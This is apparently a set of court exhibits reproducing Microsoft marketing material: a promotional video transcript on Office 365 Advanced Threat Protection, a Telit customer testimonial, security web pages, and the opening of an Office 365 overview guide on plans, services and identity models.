And we combine that with our
advanced Safe Attachments
and Safe Links capabilities.
Now, these capabilities
open the attachment or link
in a sandbox environment,
where the content
is meticulously analyzed by
our machine learning models
that check for malicious signals
and apply deep link inspection.
This allows for zero day
malicious attachments
and links to be detected.
Each month, we detonate
around one billion items
in our sandbox and the
telemetry feeds back
into the Microsoft
Intelligent Security Graph
to help our machine learning stay current
with new and emerging techniques.
Even if the message
passes through detonation,
the content is further analyzed
by multiple machine learning models
that examine the full message,
looking for suspicious
elements, and we take actions
based on what you've configured as policy.
Now, once an email is
delivered, threats can continue.
Sophisticated attackers
will plan to ensure
links passed through the first
round of security filters

by making the links benign,
only to weaponize them
once the message is delivered.
Meaning that the destination of that link
is altered later to point
to a malicious site.
Time is important when
thwarting this type of attack.
20% of all clicks happen
within just five minutes
of when an email is received,
and with Safe Links,
we're able to protect users
right at the point of click
by checking the link for reputation
and triggering detonation if necessary.
Now, this protection also
extends to internal-only emails,
where unlike other solutions,
we're able to scan and isolate threats
without routing these emails
outside of Office 365.
Also, with native link
rendering, users are made aware
of the site that they're
gonna be directed to
as they hover over the link.
Beyond that, the service
will continue to scan

email content for multiple days,
leveraging new intelligence to
move newly-discovered malware
or phish by design to the junk folder
through a capability
called Zero-Hour Auto Purge
that zaps malicious content even after
it's landed into a user's inbox.
Also, if malicious files or links
are uploaded to SharePoint
or OneDrive and shared,
even by Microsoft Teams,
our protection layers
will detect it and block
it, containing the threat
by preventing the file from being opened
or shared in the future.
And by enabling the
Report Message capability
in your tenant, users
can self-report any email
that appears suspicious for validation
by Microsoft and your security teams.
Now, as a security team, we'll

give you real-time reports
to allow you to see emails
within your organization
and how they were handled by Office 365.
This includes messages flagged by users
as potential threats.
Office 365 will additionally
proactively surface
insights and recommendations,
which you can then use
to determine what additional
policies and protections
you need to consider
within your environment.
As you determine your response,
all policies are located
in the Security Center.
Here, for example, you can
set your phishing policy
and impersonation settings,
and you can also dive deeper in
to investigate or determine patterns.
For example, under Threat Management,
you can drill in to see
the top malware types
and the top targeted users.
Now, files get quarantined,
you can go in and review those
and see those messages and
see how often they were sent.
You can also look at detonations,
set a date range, and get details
on the nature of the threat
and why it was detected.
In Threat Explorer, malicious emails

can be quickly identified with
options to filter on sender,
recipient, subject, or other
metadata in the message.
Filtering on sender helps you see
all the mails that were sent
from a unique sender address
used for a phishing campaign.
You can then investigate
these emails further
and take actions, for example,
purging a malicious
email campaign entirely
from all mailboxes in
your organization at once.
Investigation into an incident
can also be separately delegated
to your security investigation team,

leaving it to your security
admins to take final actions.
Also, because we know that
there are common security issues
that you'll want to check over time,
whether that's reviewing your events,
giving alerts, or
determining threat trends,
the treat tracker on our
threat intelligence service
enables ongoing supervision
of your security tasks.
So that was a quick
overview of how Office 365
Advanced Threat Protection
prevents and helps you
to respond to advanced threats
from email phishing attacks
and zero day malware
before they disrupt your business.
We also help you to
broadly educate your users
and augment your internal
penetration testing capabilities
by simulating phishing attacks
in your organization to raise awareness
on what to look for in
a phishing campaign.
And of course, there
are also other measures
that you can put in place to
protect your user identities.
82% of all security breaches
occur due to stolen passwords,
and we estimate that just by enabling
multi-factor authentication
in your organization,
you can reduce the risk of
attacks by up to 99.99%.
To learn more and to try out Office 365
Advanced Threat Protection
capabilities for yourself,
please visit the link shown,
and thanks for watching.

(soft music)

Case 0:20-cv-60416-AMC   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 1 of 2

# EXHIBIT 9

September 24, 2018

# Telit

Headquartered in London, Telit enables customers all over the world to design and implement Internet of Things solutions, while the company's IT team works hard to safeguard data and integrate acquired businesses. Telit recently upgraded to Microsoft 365 E5, adding Enterprise Mobility + Security to its existing Office 365 and Windows 10 deployments. Now, employees stay productive on the move, and the security team has a set of integrated tools to help protect more than 1,000 users efficiently.

**Customer**
Telit

**Products and Services**
Azure Active Directory
Azure Advanced Threat Protection
Cloud App Security
Microsoft 365 Enterprise
Office 365 Advanced Threat Protection
Office 365 Threat Intelligence
Windows 10
Windows Defender Advanced Threat Protection

**Industry**
Professional Services

**Organization Size**
Large (1,000 - 9,999 employees)

" We no longer have to worry about what security product we'll use. With Microsoft 365, we're covered. "

—Itzik Menashe: VP IT and Information Security
  Telit

Case 0:20-cv-60416-XXXX   Document 3-12   Entered on FLSD Docket 02/26/2020   Page 168 of 726

# EXHIBIT 10

Case 0:20-cv-60416-XXXX   Document 3-12   Entered on FLSD Docket 02/26/2020   Page 2 of 2

https://www.microsoft.com/en-us/security/technology

Security solutions    **Microsoft Privacy approach**    Customer story    Products    Additional resources



# "We no longer have to worry about what security product we'll use. With Microsoft 365, we're covered."

– Itzik Menashe, VP IT and Information Security

Read their story  ›

## Secure Products

### Microsoft Azure

Microsoft Azure strengthens the security of your hybrid cloud workloads.

Learn more  ›

### Microsoft 365

Microsoft 365 helps protect your identities, data, apps, and endpoints from cyber threats.

Learn more  ›

# EXHIBIT 11

https://www.microsoft.com/en-us/security/technology/threat-protection

Protects your assets   **Threat protection services**   In-depth webcasts   Latest news   Additional threat protection resources



# "We no longer have to worry about what security product we'll use. With Microsoft 365, we're covered."

- Itzik Menashe, VP IT and Information Security, Telit

Read the story >

## In-depth webcasts







### Automated incident response

Learn about the sophisticated and intelligent automated incident response provided by Microsoft Threat Protection.

▷ Watch video

### Security for your entire ecosystem

Learn how Microsoft Azure Sentinel cloud-native SIEM provides intelligent security analytics at cloud scale for your entire enterprise.

▷ Watch video

### Innovative threat protection

Learn about the power of human expertise, AI, and natively integrated threat and vulnerability management for endpoints.

▷ Watch video

Case 0:20-cv-60416-AMC Document 31-1 Entered on FLSD Docket 02/26/2020 Page 172 of 726

# EXHIBIT 12

Case 0:20-cv-60416-XXXX Document 1-14 Entered on FLSD Docket 02/26/2020 Page 2 of 147





# Office 365: Everything You Wanted to Know

## How to Use this Document?

The **intended audience** of this document are the **IT Pros** (Primary) and **Developers** (Secondary) in **Organizations** using or planning to deploy Office 365. They can use this document as a reference to learn all-up Office 365 capabilities and plan the adoption journey and application development.

This document is meant to **complement existing Office 365 resources**, available on TechNet, MSDN, Office Blogs and Support websites, and draws heavily from them for content. A high-level information on Office 365 and its service is aggregated and made available in one place. Readers are encouraged to refer to the online resources shared, in each section, for more information.

Information and online resources on new Office 365 services and updates are given at multiple places in this document. Please refer to the online Office 365 Roadmap and your tenant's Office 365 Message Center for current status of the updates.

A successful Office 365 rollout focuses on driving adoption and helping everyone understand the benefits of working in a new way. The sections – Four steps towards successful adoption and Getting Started Scenarios give walkthrough of the guidance and resources available from Microsoft for successful adoption.

> Microsoft is using Microsoft Azure, Office 365 and Microsoft Dynamics to deliver the industry's most complete cloud — for every business, every industry, and every geography. Microsoft's Enterprise Cloud Roadmap section summarizes and compares Microsoft's offerings across SaaS, PaaS, IaaS, and private cloud offerings.

 **Important Note**

Keeping pace with the Office 365 innovation, this document would get updated at least once in a month. Please don't refer to this document if the last modified date shown below is more than **3 months** old. Request for the latest copy.

Last modified: **Monday, February 24, 2020.**

# Table of Contents

Welcome to Office 365 .............................................................. 1
   Office 365 Services ............................................................ 4
   Moving to Office 365 ......................................................... 9
Driving Office 365 adoption .................................................. 11
   Four Steps Towards Successful Adoption .................... 11
   Getting Started Scenarios ............................................. 12
   Productivity Library ......................................................... 13
   Typical Solutioning Process ........................................... 14
   Online Resources ............................................................. 15
Services Overview .................................................................. 17
   Exchange Online (EXO) ................................................... 17
   Exchange Online Archiving (EOA) ................................. 18
   Skype for Business Online (Skype) .............................. 19
   Skype Meeting Broadcast .............................................. 21
   Cloud PBX .......................................................................... 23
   SharePoint Online (SPO) ................................................ 25
   OneDrive for Business (OneDrive) ............................... 36
   Office 365 Videos ............................................................ 42
   Yammer ............................................................................. 44
   Office 365 Groups ........................................................... 48
   Microsoft Teams (Preview) ............................................ 52
   Delve .................................................................................. 56
   Power BI Pro ..................................................................... 59
   MyAnalytics ...................................................................... 62
   Office 365 ProPlus (Office) ............................................ 65
   Office 2016 for Mac ........................................................ 66
   Office on iOS, Android, Windows ................................. 67
   Sway .................................................................................. 68
   Exchange Online Protection (EOP) ............................... 68
   Advanced Threat Protection (ATP) ............................... 69
   RMS for Office 365 (RMS) .............................................. 70
   O365 Message Encryption (OME) ................................. 72
   Office 365 Security & Compliance Center ................... 73
   Data Loss Prevention (DLP) ........................................... 76
   eDiscovery and Content Search ................................... 77

   Advanced eDiscovery ...................................................... 77
   MFA for Office 365 (MFA) .............................................. 78
   MDM for Office 365 (MDM) ........................................... 80
   Customer Lockbox ........................................................... 82
   Office 365 Advanced Security Management ............... 82
   Office 365 Secure Score ................................................. 84
   Threat Intelligence (Preview) ........................................ 86
   Advanced Data Governance (Preview) ........................ 86
Plan Office 365 security & information protection ............. 88
Migrate your Org's data to Office 365 Enterprise .............. 90
   Migrate email to Office 365 ........................................... 90
   Migrate files and folders ................................................ 90
   Migrate Skype for Business users ................................ 91
   Archiving third-party data .............................................. 91
Office 365 Application Development .................................... 93
   Office 365 APIs ................................................................. 93
   Microsoft Graph .............................................................. 94
   SharePoint Online Development .................................. 95
   Office UI Fabric ................................................................ 99
   OneDrive API ................................................................... 99
   Office 365 Connectors ................................................. 100
   Business Application Platform ..................................... 100
   Microsoft PowerApps .................................................. 101
   Microsoft Flow .............................................................. 102
   Office Add-ins ................................................................ 103
   Skype Developer Platform ........................................... 104
   Azure WebJobs ............................................................. 105
   Office 365 Developer Patterns and Practices ......... 106
Enterprise Mobility + Security (EMS) ................................. 107
   Solutions ......................................................................... 107
   Business Benefits .......................................................... 109
   Products .......................................................................... 110
Microsoft's Enterprise Cloud Roadmap ............................ 111
   Cloud Services and Platform Options ....................... 111
   Microsoft IT moves its workloads to the cloud ...... 113
   Microsoft cloud storage options ............................... 113

# WELCOME TO OFFICE 365

Office 365 is the most complete, secure cloud productivity service to help companies empower employees on the digital transformation journey.

To help companies maximize opportunities while going through digital transformation, we are delivering innovation in Office 365 against these key technology investment areas:

- **Collaboration**: Only Office 365 delivers a robust collaboration solution that meets the needs of diverse groups (whether that's generational, geographical, functional or workstyle) and provides the option to collaborate as a team across applications through Office 365 Groups.
- **Mobility**: Office 365 enables mobile productivity across many scenarios for any corporate or personal device (Windows, iOS or Android) and protects both users and company data with built-in security.
- **Intelligence**: In addition to delivering powerful visualizations and insights for everyone with Power BI and Excel, Office 365 is built on the Microsoft Graph which uses machine learning to infuse intelligence into each application to connect people and information faster.
- **Trust**: Office 365 is secure & compliant, manageable, extensible, and always up to date with ongoing cloud updates. We provide a 99.9% uptime financially-backed SLA, Fast Track benefits and the transparency and enterprise commitment of a public-facing roadmap**.**

Office 365 is designed meet the unique collaboration needs of every group. For every collaboration category, Office 365 includes a purpose-built application. Together, these create a holistic solution that embrace diverse needs and workstyles and makes us different than any other vendor on the market.



| Mail & Calendar | Co-Authoring Content | Sites & Content Management |
| --- | --- | --- |
| *Outlook* | *Office365 Pro Plus* | *SharePoint* |

| Voice, Video & Meetings | Chat-based Workspace | Enterprise Social |
| --- | --- | --- |
| *Skype* | *Microsoft Teams* | *Yammer* |

## Choice and Flexibility

Large enterprises are not usually ready to move all of their workloads to the cloud at once. With Office 365, customers can choose between a cloud deployment, an on-premises solution, or a hybrid environment that integrates cloud services into an on-premises IT infrastructure.

Customers can move some users to the cloud and keep others on-premises for compliance or operational reasons. This enables customers to move to the cloud at a pace that makes sense for their unique business needs. If they choose a hybrid infrastructure, users will probably never know the difference, and customers can use the same management tools across online and on-premises servers.

> *Office 365 offers organizations the choice of various SKU plans to meet the needs a diverse workforce while continuing to keep their IT costs low.*

Large enterprise organizations have a diverse end-user base with different job profiles. Some users are involved in corporate job functions that require access to dedicated devices and rich robust applications. Alongside those are users who constitute a mobile workforce and either share devices or have lightweight technology usage scenarios.

## Change Management Discipline

When implementing new solutions, enterprises rely on change-management processes and workflow to minimize the impact on their organizations. Enterprises cannot be hampered by unpredictable changes, inconsistent delivery, or the sudden disappearance of features. The power of cloud-based services is that they are always up-to-date and offer an experience that gradually improves over time. We realize that change can be daunting, and IT administrators need tools and information to manage ongoing change.

> *Microsoft customers will receive advance notice of significant changes to Office 365 so they can plan effectively.*

We provide visibility for planned updates that are in development and in the process of being rolled out to the service, as well as items that have been launched and are now generally available for all eligible customers.

## Office 365 Roadmap

The Office 365 Roadmap lists updates that are currently planned for applicable subscribers. Updates are at various stages from being in development to rolling-out to customers to being generally available for applicable customers world-wide

The roadmap provides customers a centralized place to learn more about pending updates before those changes come to the service. It provides a forward-looking view of new features, enhancements, and major updates, which in some cases may extend farther than just a few months, as evidenced by our long-term communications around Delve and Office Graph.

## Privacy, Security and Compliance

While end-user expectations and demand for the latest tools is high, IT has to balance this pressure to meet users' needs with the requirement to adhere to corporate policies, industry regulations, and applicable laws.

Historically, security and compliance technologies and mandates were perceived as disruptive to productivity, driving down employee satisfaction while driving up IT costs. If users feel impeded by the technology they're given, they often look for ways around it, which in turn can create new corporate non-compliance issues and bring the problem full circle.

> It's difficult to run a competitive business with information and access totally locked down-- the trade-offs on agility and decision making are too great.

This is why we believe that the most well-run organizations are those in which people are empowered to do their best work, on any device, while IT is able to responsibly manage security and compliance requirements.

Office 365 includes two equally important capabilities:

1. **Service-level capabilities** that include technical features, operational procedures, and policies that are enabled by default for customers using the service
2. **Customer controls** that include features that enable businesses to customize the Office 365 environment based on the specific needs of their organization

## Office 365 Trust Center

Office 365 Trust Center is the place where we share our commitments and information on trust-related topics. The core tenets of our approach to earning and maintaining your trust are:

- Built-in security
  - Service-level security through defense-in-depth
  - Customer controls within the service
  - Security hardening and operational best practices
- Privacy by design
  - Your data is not used for advertising
  - You have extensive privacy controls

- You can take your data with you when you want
- Continuous compliance
  - Proactive processes to meet evolving compliance needs
  - Customer controls for organizational compliance
  - Independently verified to meet evolving standards
- Transparent operations
  - You know where your data resides and who has access
  - Visibility into availability and changes to the service
  - Financially backed guarantee of 99.9% uptime

**Resources**

- The video series - Conversations from Inside the Cloud
- Office 365 Compliance Framework for Industry Standards and Regulations
- Office 365 security white paper
- Office 365 privacy white paper
- Protecting data and privacy in the cloud
- Tenant Isolation in Microsoft Office 365
- Customer controls for information protection white paper
- Security Incident Management in Microsoft Office 365
- File Security in Microsoft SharePoint and OneDrive for Business

## Service Assurance

Use **Service assurance** in the **Office 365 Security & Compliance Center** to access documents that describe a variety of topics, including:

- Microsoft security practices for customer data that is stored in Office 365.
- Independent third-party audit reports of Office 365.
- Implementation and testing details for security, privacy, and compliance controls that Office 365 uses to protect your data.

You can also find out how Office 365 can help comply with standards, laws, and regulations across industries, such as the:

- International Organization for Standardization (ISO) 27001 and 27018
- Health Insurance Portability and Accountability Act of 1996 (HIPAA)
- Federal Risk and Authorization Management Program (FedRAMP)

| Content available | Description |
|---|---|
| **Compliance reports** | |
| • FedRamp<br>• GRC Assessment<br>• ISO<br>• SOC/SSAE | Use service compliance reports to review audit assessments performed by third-party independent auditors of Office 365 Service Delivery Operations. |
| **Trust documents** | |
| • FAQ and White Papers<br>• Risk Management Reports | Use white papers, FAQs, end-of-year reports and other Microsoft Confidential resources that are made available to you under non-disclosure agreement for your review / risk assessments. |

| Content available | Description |
|---|---|
| **Audited controls** | |
| Global standards and regulations that Office 365 has implemented. | Help with risk-assessment when you're evaluating, onboarding, or using Office 365 services. Find out: <ul><li>How Office 365 controls meet security, compliance, and privacy requirements.</li><li>About tests that have been applied to controls in Office 365, results of these tests, and when they were completed.</li></ul> |

For more details, refer to the [Service assurance in the Office 365 Security & Compliance Center](#) article.

## Security in a Cloud-Enabled World

### Security in the cloud is a partnership

The security of your Microsoft cloud services is a partnership between you and Microsoft.



### Keys to success

Enterprise organizations benefit from taking a methodical approach to cloud security. This involves investing in core capabilities within the organization that lead to secure environments.

**Governance & Security Policy**

Microsoft recommends developing policies for how to evaluate, adopt, and use cloud services to minimize creation of inconsistencies and vulnerabilities that attackers can exploit.

Ensure governance and security policies are updated for cloud services and implemented across the organization:

- Identity policies
- Data policies
- Compliance policies and documentation

**Administrative Privilege Management**

Your IT administrators have control over the cloud services and identity management services. Consistent access control policies are a dependency for cloud security.

Privileged accounts, credentials, and workstations where the accounts are used must be protected and monitored.

**Identity Systems and Identity Management**

Identity services provide the foundation of security systems. Most enterprise organizations use existing identities for cloud services, and these identity systems need to be secured at or above the level of cloud services.

**Threat Awareness**

Organizations face a variety of security threats with varying motivations. Evaluate the threats that apply to your organization and put them into context by leveraging resources like threat intelligence and Information Sharing and Analysis Centers (ISACs).

**Data Protection**

You own your data and control how it should be used, shared, updated, and published.

You should classify your sensitive data and ensure it is protected and monitored with appropriate access control policies wherever it is stored and while it is in transit.

> Please refer to the [Office 365 Security & Compliance Center](#) and [Enterprise Mobility + Security](#) sections later in this document.

**MSIT Showcase**: [Changing our approach to information security at Microsoft](#).

With collaboration on the rise, Microsoft IT is rethinking information security. Social collaboration, ubiquitous connectivity, and new ways of collecting data and storing content encourage innovation and content sharing—but they also pose potential security risks for organizations. We help protect content through technologies like Microsoft Office Delve, Azure Information Protection, and Microsoft Teams—securing content wherever it exists, and in ways that go beyond traditional IT security.

## Industry Leadership

Leading technology research companies Gartner Inc. and Forrester evaluate technology vendors and their solutions on a regular basis, and then publish research reports for customers. Both research companies have recognized Microsoft Office 365 as a "leader" and rated it "positive" in their research reports.

| | | |
|---|---|---|
| The Forrester Wave™: Enterprise Collaboration, Q4 2016 | Dec 2016 | Leader |
| Cloud Access Security Broker Leadership Compass, 2016 | Aug 2016 | Leader |
| Magic Quadrant for Unified Communications as a Service, Worldwide | Aug 2016 | Challenger |
| Magic Quadrant for Sales Force Automation | Aug 2016 | Leader |
| Magic Quadrant for Unified Communications | Jul 2016 | Leader |
| Magic Quadrant for Mobile App Development Platforms | Jun 2016 | Leader |

| Magic Quadrant for Enterprise Mobility Management Suites | Jun 2016 | Visionary |
|---|---|---|
| The Forrester Wave: Enterprise File Sync And Share Platforms, Cloud Solutions, Q1 2016 | Mar 2016 | Leader |
| Gartner Magic Quadrant for Web Conferencing | Dec 2015 | Leader |
| Gartner Magic Quadrant for Social Software in the Workplace | Oct 2015 | Leader |
| The Forrester Wave: Agile Business Intelligence Platforms, Q3 2015 | Sep 2015 | Leader |
| Gartner Magic Quadrant for Unified Communications as a Service | Sep 2015 | Challenger |
| Gartner Magic Quadrant for Unified Communications | Aug 2015 | Leader |
| Gartner Magic Quadrant for Secure Email Gateways | Jun 2015 | Leader |
| Gartner Magic Quadrant for Business Intelligence and Analytics Platforms | Feb 2015 | Leader |

Refer to Analyst Relations – Reports page for a collection of reports published by leading independent analyst firms.

## Office 365 Services

Office 365 Enterprise E5 includes:

| Office suite | Always have latest versions of Office apps:<br>• Capture your ideas however you work best—using a keyboard, pen, or a touchscreen.<br>• Easily format information in Excel with tools that recognize your pattern and autocomplete data.<br>• Easily incorporate content from PDFs to create your own great-looking Word documents |
|---|---|
| Office on PCs, tablets, and phones | Enjoy a fully installed Office experience across PCs, Macs, Windows tablets, iPad® and Android™ tablets, and most mobile devices. Each user can install Office on 5 PCs or Macs, 5 tablets (Windows, iPad, and Android), and 5 phones |

Plus, these online services:

| Online Meetings | Host online meetings with audio, HD video, and web conferencing over the Internet. Join meetings with a single touch or click from the smartphone, tablet, or PC of your choice |
|---|---|
| Meeting Broadcast | Broadcast Skype for Business meetings on the Internet for to up to 10,000 people, who can attend in a browser on nearly any device. Meetings include real-time polling |

|  | and sentiment tracking, plus Yammer, to enable dialogue during the broadcast |
|---|---|
| PSTN conferencing | Enable attendees to join Skype for Business from any telephone by dialing a local access number, and dial out from a meeting to add others when needed. The dial-in capability is in addition to single-touch join options on PC, smartphone, and browser, and allows people to join an online meeting even in places with no Internet access. Consumption rates are available. |
| Modern voice with Cloud PBX | Make, receive, and transfer business calls in the office, at home, or on the road, using phone, PC, and mobile without the need for a traditional phone system. Choose PSTN calling plans delivered by Microsoft where available, or use existing phone lines at your locations. |
| Instant messaging and Skype connectivity | Connect with other Skype for Business users via instant message, voice calls, and video calls, and let people know your availability with your online status. Share presence, IM, and audio calling with Skype users |
| Chat-based workspace | Connect your team with Microsoft Teams in Office 365, where chat, content, people, and tools live together, so your teams have instant access to everything they need. |
| Email and calendars | Use business-class email through a rich and familiar Outlook experience you can access from your desktop or from a web browser using Outlook on the web. Get 50GB of storage and unlimited archive storage per user. Also, send attachments up to 150 MB |
| Advanced email | Use archiving and legal hold capabilities, plus unlimited storage, for compliance needs. Use data loss prevention (DLP) policies and policy tips that educate your users for additional compliance enforcement in email. |
| Document and email access control | Rights Management Services enables you to restrict access to documents and email to specific people and to prevent anyone else from viewing or editing them, even if they are sent outside the organization. |
| Advanced information protection | Data loss prevention and encryption across Exchange Online, Skype for Business, and SharePoint Online help keep your content safe in email, IM and meetings, and team sites. |
| Advanced security | Advanced Threat Protection helps defend users against sophisticated threats hidden in emails, attachments, and links. Customer Lockbox lets you limit data access to only pre-assigned, two-factor-authenticated administrator approvals for greater control and transparency. And the built-in features of Office 365 Advanced Security Management give you enhanced visibility and control of your Office 365 environment. |
| Analytics tools | With the live dashboards and interactive reports of Power BI non-technical users can |

| | visualize and analyze data with greater speed, efficiency, and understanding. With its interactive dashboards, Microsoft MyAnalytics enables you to surface personal and organizational insights based on information across Office 365. |
|---|---|
| File storage and sharing | OneDrive for Business gives each user 1 TB of personal cloud storage that can be accessed from anywhere and syncs with their PC/Mac for offline access. Easily share documents with others inside and outside your organization and control who can see and edit each file. |
| Team Sites | Enable easy access and sharing of documents with 1 TB of baseline storage plus 500 MB of storage per user. Share insights through interactive reports with Excel Services and Visio Services, and view them on mobile device browsers that support HTML5. |
| Corporate social network | Yammer collaboration software and business applications allow your employees to connect with the right people, share information across teams, and organize around projects so they can communicate further, faster. |
| Office Online | Create and edit Word, OneNote, PowerPoint, and Excel documents from any modern browser. |
| Work management | Planner makes it easy for your team to create new plans, organize and assign tasks, share files, chat about what you're working on, and get updates on progress. |
| Professional digital storytelling | With Sway, a new Office 365 app, you can easily create engaging, interactive web-based reports, presentations, newsletters, trainings and more—right from your phone, tablet, or browser. Sways are easy to share and look great on any screen. |
| Mobility | Sync email, calendar, and contacts; access SharePoint sites; view and edit Office documents with Office Online using a browser on Windows Phone, iOS, and Android devices. |
| Enterprise management of apps | Simplify management of apps in your organization with Group Policy, Telemetry, and Shared Computer Activation. |
| Search and discovery | Stay in the know. Search and discover content across Office 365 based on personalized insights. Office Delve is the first experience to be powered by Office Graph, a collection of analyzed signals or insights derived from each user's behavior and relationships to content, topics, and contacts. |
| Corporate video portal | Easily manage videos within your organization. Office 365 Video is a company-wide destination for video upload, sharing and discovery, and smooth playback across devices. |

| Voicemail integration (Unified Messaging) | Hosted voicemail support integrated with Cloud PBX. Voicemails are recorded to Exchange Online and users can access them from Outlook, Outlook Web App, or compatible mobile and IP phones. |
|---|---|
| Compliance solutions | With the Compliance Center, you can search in-place across Exchange, Skype for Business, OneDrive for Business, and SharePoint. Advanced eDiscovery fully integrates the Equivio machine learning, predictive coding, and text analytics platform to reduce the costs and challenges that come with sorting through large quantities of data for eDiscovery purposes by quickly zeroing in on what is relevant. |
| Apps for Office and SharePoint | New third-party and customer-developed apps work with Office and SharePoint to bring web services right into your documents and sites. |

All Office 365 Enterprise Plans include:

| Reliability | Get peace of mind knowing your services are available with a guaranteed 99.9% uptime, financially backed service level agreement (SLA) |
|---|---|
| Security | Cutting-edge security practices with five layers of security and proactive monitoring help keep customer data safe |
| Privacy | Your data is yours. We safeguard it and protect your privacy |
| Administration | The admin portal provides IT detailed configuration options for your services, either from an online portal or through automated management with PowerShell commands. You can use the Admin app to manage your services on the go |
| Up to date | No need to pay for version upgrades; updates are included in your subscription. New features are rolled out to Office 365 customers in an IT-configurable experience |
| Active Directory Integration | Manage user credentials and permissions. Single sign-on and synchronization with Active Directory |
| Support | 24/7 phone support for all IT issues. For less urgent issues, you can make service requests directly through the admin portal |

For more information, refer to Office 365 for Enterprises and Office 365 Service Descriptions.

**Microsoft Teams joins the Office 365 universal toolkit**

**Microsoft Teams** joins the broadest and deepest portfolio of collaboration applications and services to help solve the diverse

needs of people and organizations globally. As we've learned from our **85 million active monthly users**, all groups have a diverse set of needs when it comes to working together. Office 365 is designed for the unique workstyle of every group and includes purpose-built applications, all deeply integrated together.

- **Exchange** is the undisputed leader in corporate email and according to Gartner has "80 percent share of companies using cloud email with revenue above $10 billion."
- **SharePoint** provides intranets and content management solutions to more than 200,000 organizations and 190 million people.
- **Yammer** is the social network for work, enabling cross-company discussions for 85 percent of the Fortune 500.
- **Skype for Business** provides real-time voice, video and conferencing and hosts more than 100 million meetings a month.
- **Office 365 Groups** is our cross-application membership service that makes it easy for people to move naturally from one collaboration tool to another.

> **Note**: Microsoft Teams is available in preview to eligible Office 365 commercial customers. **We expect the service to become generally available in the first quarter of calendar year 2017**.

## Plans & Services Mapping

Office 365 is available in a variety of plans in order to best meet the needs of your organization. The TABLE below shows the availability of services across K1, E1, E3 and E5 suite plans.

| Office 365 Plans | K1 | E1 | E3 | E5 |
|---|---|---|---|---|
| **Communicate** | | | | |
| Exchange Online (EXO) | ● | ● | ● | ● |
| Exchange Online Archiving (EOA) | | | ● | ● |
| Skype for Business Online (Skype) | | ● | ● | ● |
| Skype Meeting Broadcast | | ● | ● | ● |
| Cloud PBX | | | | ● |
| PSTN Conferencing | | | | ● |
| **Collaborate & Discover** | | | | |
| SharePoint Online (SPO) | ● | ● | ● | ● |
| OneDrive for Business (OneDrive) | | ● | ● | ● |
| Outlook Groups | | ● | ● | ● |
| *Microsoft Teams\** | | ● | ● | ● |
| Yammer | | ● | ● | ● |
| Office 365 Videos | | ● | ● | ● |
| Microsoft Planner | | ● | ● | ● |
| Delve | | ● | ● | ● |
| StaffHub | ● | ● | ● | ● |
| **Insights** | | | | |
| Power BI Pro | | | | ● |
| MyAnalytics | | | | ● |

| Office 365 Plans | K1 | E1 | E3 | E5 |
|---|---|---|---|---|
| **Office** | | | | |
| Office 365 ProPlus (Office) | | | ● | ● |
| Office 2016 for Mac | | | ● | ● |
| Office on iOS, Android, Windows | | | ● | ● |
| Office Online | ● | ● | ● | ● |
| Sway | ● | ● | ● | ● |
| **Security & Compliance** | | | | |
| Office 365 Secure Score | ● | ● | ● | ● |
| Audit Log Search, Activity APIs | ● | ● | ● | ● |
| Exchange Online Protection (EOP) | ● | ● | ● | ● |
| MDM for Office 365 (MDM) | ● | ● | ● | ● |
| MFA for Office 365 (MFA) | ● | ● | ● | ● |
| RMS for Office 365 (RMS) | | | ● | ● |
| O365 Message Encryption (OME) | | | ● | ● |
| Data Loss Prevention (DLP) | | | ● | ● |
| eDiscovery, Content Search | | | ● | ● |
| Customer Lockbox | | | | ● |
| Advanced Threat Protection (ATP) | | | | ● |
| Advanced Security Management | | | | ● |
| Advanced eDiscovery | | | | ● |
| *Threat Intelligence\** | | | | ● |
| *Advanced Data Governance\** | | | | ● |
| **Application Development** | | | | |
| Microsoft Graph API | ● | ● | ● | ● |
| Office 365 REST APIs | ● | ● | ● | ● |
| Microsoft Flow | | ● | ● | ● |
| Microsoft PowerApps | | ● | ● | ● |
| **Infrastructure Services** | | | | |
| Azure AD Basic | ● | ● | ● | ● |
| Cloud Identity | ● | ● | ● | ● |
| Federated Identity | ● | ● | ● | ● |
| Office 365 Groups | ● | ● | ● | ● |

\* will be available in the first quarter of 2017.

## Mobile Apps

| Application | ⊞ | 🍎 | 🤖 |
|---|---|---|---|
| Word, Excel, PowerPoint, OneNote | ● | ● | ● |
| Microsoft Outlook, OWA | ● | ● | ● |
| Skype for Business | ● | ● | ● |
| *Microsoft Teams\** | ● | ● | ● |
| Yammer | ● | ● | ● |
| OneDrive | ● | ● | ● |

| Application | ⊞ | 🍎 | 🤖 |
|---|:---:|:---:|:---:|
| Outlook Groups | | ● | ● |
| SharePoint | ● | ● | ● |
| Office 365 Videos | | ● | |
| Delve | ● | ● | ● |
| StaffHub | | ● | ● |
| Microsoft Flow | | ● | ● |
| PowerApps | | ● | ● |
| Power BI | ● | ● | ● |
| RMS Sharing | ● | ● | ● |
| O365 Message Encryption Viewer | | ● | ● |
| Office 365 Admin | ● | ● | ● |

## Bundled Storage

Office 365 Enterprise Plans come with base storage as part of subscription.

| Service | Storage per user |
|---|---|
| Exchange Online (K1) | 2GB |
| Exchange Online (E1) | 50GB |
| Exchange Online (E3) | 50GB + Unlimited Archive |
| SharePoint Online | 1TB + (0.5GB * E users) |
| OneDrive for Business (E1) | 1TB |
| OneDrive for Business (E3) | 5TB* |
| Yammer | No Limits |

**Note**: Office 365 Videos leverages SharePoint Online storage and, when needed, additional storage can be purchased for SharePoint Online.

## Office 365 identity and Azure Active Directory

Office 365 uses the **cloud-based user authentication service Azure Active Directory** to manage users. You can choose from three main identity models in Office 365 when you set up and manage user accounts:

- **Cloud identity**. Manage your user accounts in Office 365 only. No on-premises servers are required to manage users; it's all done in the cloud.



In this model, you create and manage users in the Office 365 admin center and store the accounts in Azure AD. Azure AD verifies the passwords. Azure AD is the cloud directory that is used by Office 365. No on-premises servers are required — Microsoft manages all that for you.

- **Synchronized identity**. Synchronize on-premises directory objects with Office 365 and manage your users on-premises. You can also synchronize passwords so that the users have the same password on-premises and in the cloud, but they will have to sign in again to use Office 365.



In this model, you manage the user identity in an on-premises server and synchronize the accounts and, optionally, passwords to the cloud. The user enters the same password on-premises as he or she does in the cloud, and at sign-in, the password is verified by Azure AD. This model uses a directory synchronization tool to synchronize the on-premises identity to Office 365.

- **Federated identity**. Synchronize on-premises directory objects with Office 365 and manage your users on-premises. The users have the same password on-premises and in the cloud, and they do not have to sign in again to use Office 365. This is often referred to as single sign-on.



This model requires a synchronized identity but with one change to that model: the user password is verified by the on-premises identity provider. This means that the password hash does not need to be synchronized to Azure AD. This model uses Active Directory Federation Services (AD FS) or a third-party identity provider.

